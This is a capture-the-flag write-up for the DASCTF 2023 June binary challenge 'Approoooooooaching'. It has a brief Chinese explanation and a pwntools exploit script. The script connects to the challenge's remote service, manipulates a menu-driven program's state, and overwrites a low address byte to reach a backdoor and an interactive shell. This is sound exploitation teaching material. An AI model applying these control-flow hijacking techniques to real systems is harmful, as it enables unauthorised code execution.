DASCTF 2023六月挑战赛 二进制专项 Approoooooooaching
先控制 v3 减少 4,然后控制进入 case 6 并输入数据,就可以改变程序流程了(做得很莫名其妙)。
输入后门地址的低字节即可。
from pwn import *
# pwntools global settings: 64-bit Linux target, every byte of traffic logged,
# and debugger windows opened as a horizontal tmux split.
context(arch='amd64', os='linux', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']

# Path of the local copy of the challenge binary.
file_name = './bf'


def li(x):
    """Print ``x`` in bold using 256-colour ANSI index 214, then reset."""
    prefix = '\x1b[01;38;5;214m'
    suffix = '\x1b[0m'
    print(prefix + str(x) + suffix)


def ll(x):
    """Print ``x`` in bold using 256-colour ANSI index 1, then reset."""
    prefix = '\x1b[01;38;5;1m'
    suffix = '\x1b[0m'
    print(prefix + str(x) + suffix)


# NOTE(review): despite its name, a truthy ``debug`` selects the REMOTE
# service; only a falsy value starts the local binary. Check this flag before
# running so traffic goes where you intend.
debug = 1
r = remote('139.155.140.235', 9999) if debug else process(file_name)

# Parsed ELF of the local binary; loaded in both modes.
elf = ELF(file_name)
def dbg():
    """Attach gdb to the current tube ``r``."""
    target = r
    gdb.attach(target)
def dbgg():
    """Block until the operator presses Enter; the typed line is discarded."""
    # NOTE(review): raw_input is not a Python 3 builtin; this relies on the
    # name being in scope at runtime (presumably via the star-import) — confirm.
    _ = raw_input()
# Prompt text that add/edit/delwith/exe wait for before sending a menu choice.
menu = 'Give me your choice: \n'
def add(size):
    """Choose menu option 1 and answer the ``size: `` prompt.

    ``size`` is converted with ``str`` before sending, so it goes out in
    decimal text form followed by a newline.
    """
    r.sendlineafter(menu, '1')
    size_text = str(size)
    r.sendlineafter('size: ', size_text)
def edit(content):
    """Choose menu option 2 and send ``content`` at the ``text: `` prompt.

    ``content`` is sent as-is, with no trailing newline appended.
    """
    r.sendlineafter(menu, '2')
    text_prompt = 'text: '
    r.sendafter(text_prompt, content)
def delwith():
    """Choose menu option 3 once the menu prompt has been received."""
    # What option 3 does inside the binary is not shown in this script.
    choice = '3'
    r.sendlineafter(menu, choice)
def exe():
    """Choose menu option 4 once the menu prompt has been received."""
    # Presumably this makes the service run the stored text — confirm
    # against the binary; the script itself only sends the choice.
    choice = '4'
    r.sendlineafter(menu, choice)
# Wait for the operator to press Enter before any menu traffic is sent.
dbgg()

# Menu option 1 with size 0x20 (sent as the decimal text "32").
add(0x20)

# Eight-character text: four 'i' followed by four 'y'. The write-up above
# says v3 is lowered by 4 and case 6 is then reached to take input; how these
# characters map onto those steps is not shown in this script.
p1 = ''.join(('i' * 4, 'y' * 4))
edit(p1)

# Menu options 3 and 4, in that order.
delwith()
exe()

# The same single value 0xDD is sent twice with no prompt wait in between.
# Per the write-up it is the low byte of the backdoor.
# NOTE(review): '\xDD' is a str, so pwntools encodes it implicitly and the
# bytes on the wire depend on its encoding setting; a bytes literal would be
# unambiguous.
for _ in range(2):
    r.send('\xDD')

# Hand the connection over to the terminal.
r.interactive()